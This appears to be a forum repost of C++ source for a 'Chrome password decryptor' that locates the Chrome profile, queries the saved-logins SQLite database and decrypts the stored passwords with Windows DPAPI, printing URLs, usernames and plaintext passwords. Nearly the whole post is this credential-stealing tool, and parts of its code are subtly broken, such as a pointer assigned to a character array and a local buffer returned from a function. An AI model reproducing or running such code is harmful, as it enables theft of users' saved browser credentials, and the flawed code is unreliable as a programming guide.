Chrome password decryptor

[Nytro]

Author: Athenian (roman)

Versiunea incarca dinamic SQLite si apeleaza dinamic functiile necesare.

/***

Chrome password decrypter

By Athenian

***/

#include <windows.h>

#include <iostream>

#include <ShlObj.h>

using namespace std;

#pragma comment(lib,"sqlite3")

#pragma comment(lib,"crypt32")

//Lets see where Google Chrome application is installed

char * readRegistryValue(){

LPCSTR value = "Path";

HKEY hkey = NULL;

char * sk = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\chrome.exe";

if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,sk,0,KEY_READ,&hkey) != ERROR_SUCCESS)

{

return NULL;

}

char path[MAX_PATH] = {0};

DWORD dw = 260;

RegQueryValueEx(hkey,value,0,0,(BYTE *)path,&dw);

RegCloseKey(hkey);

char *ret = new char[strlen(path)+1];

strcpy(ret,path);

return ret;

//delete[]ret;

}

char *Crack(BYTE *pass){

DATA_BLOB in;

DATA_BLOB out;

BYTE trick[1024];

memcpy(trick,pass,1024);

int size = sizeof(trick) / sizeof(trick[0]);

in.pbData = pass;

in.cbData = size+1;//we can't use strlen on a byte pointer,becouse of the NBs,so we have to be tricky dicky:)

char str[1024] = "";

if (CryptUnprotectData(&in,NULL,NULL,NULL,NULL,0,&out)){

for(int i = 0; i<out.cbData; i++)

str = out.pbData;

str[out.cbData]='\0';

return str;

}

else

return NULL; //Error on decryption

}

//To get to Appdata\local

bool getPath(char *ret,int id){

memset(ret,0,sizeof(ret));

if(SUCCEEDED(SHGetFolderPath(NULL,id | CSIDL_FLAG_CREATE,NULL,SHGFP_TYPE_CURRENT,ret)))

return true;

return false;

}

//SQLITE definitions

#define SQLITE_OK 0

#define SQLITE_ROW 100

#define SQLITE_API

typedef struct sqlite3 sqlite3;

typedef struct sqlite3_stmt sqlite3_stmt;

//SQLITE function pointers

typedef int(SQLITE_API *fpSqliteOpen)(const char *, sqlite3 **);

typedef int(SQLITE_API *fpSqlitePrepare_v2)(sqlite3 *, const char *, int, sqlite3_stmt **, const char **);

typedef int(SQLITE_API *fpSqliteStep)(sqlite3_stmt *);

typedef const unsigned char *(SQLITE_API *fpSqliteColumnText)(sqlite3_stmt*, int);

typedef int(SQLITE_API *fpSqliteFinalize)(sqlite3_stmt *);

typedef int(SQLITE_API *fpSqliteClose)(sqlite3 *);

fpSqliteOpen sqlite3_open;

fpSqlitePrepare_v2 sqlite3_prepare_v2;

fpSqliteStep sqlite3_step;

fpSqliteColumnText sqlite3_column_text;

fpSqliteFinalize sqlite3_finalize;

fpSqliteClose sqlite3_close;

void main(){

//Load sqlite.dll

HMODULE sqliteLib = LoadLibrary("sqlite3.dll");

if (sqliteLib){

//Lets find the functions in the dll

sqlite3_open = (fpSqliteOpen)GetProcAddress(sqliteLib,"sqlite3_open");

sqlite3_prepare_v2 = (fpSqlitePrepare_v2)GetProcAddress(sqliteLib,"sqlite3_prepare_v2");

sqlite3_step = (fpSqliteStep)GetProcAddress(sqliteLib,"sqlite3_step");

sqlite3_column_text = (fpSqliteColumnText)GetProcAddress(sqliteLib,"sqlite3_column_text");

sqlite3_finalize = (fpSqliteFinalize)GetProcAddress(sqliteLib,"sqlite3_finalize");

sqlite3_close = (fpSqliteClose)GetProcAddress(sqliteLib,"sqlite3_close");

char *installPath = readRegistryValue();

if (installPath != NULL){

printf("Installed in: %s\n",installPath);

//Now we have to call same sqlite functions to start decrypting this shit:)

sqlite3_stmt *stmt;

sqlite3 *db;

char databasePath[260];

getPath(databasePath,0x1C);

strcat(databasePath,"\\Google\\Chrome\\User Data\\Default\\Login Data");

char *query = "SELECT origin_url, username_value, password_value FROM logins";

//Open the database

if (sqlite3_open(databasePath, &db) == SQLITE_OK) {

if (sqlite3_prepare_v2(db, query, -1, &stmt, 0) == SQLITE_OK) {

//Lets begin reading data

while (sqlite3_step(stmt) == SQLITE_ROW) {

//While we still have data in database

char *url = (char *)sqlite3_column_text(stmt,0);

char *username = (char *)sqlite3_column_text(stmt,1);

BYTE *password = (BYTE *)sqlite3_column_text(stmt,2); //This is the only encrypted field

printf("Url: %s\n",url);

printf("Username: %s\n",username);

char *decrypted = Crack(password);

printf("Password: %s\n",decrypted);

}

}

else

printf("Error preparing database!\n");

sqlite3_finalize(stmt);

sqlite3_close(db);

}

else

printf("Error opening database!\n");

}

else

printf("Google Chrome is not installed!\n");

delete[]installPath;

FreeLibrary(sqliteLib);

}

else

printf("Necessary sqlite dll not found!\n");

cin.get();

}

Sursa: Google Chrome password crack - Programming - rohitab.com - Forums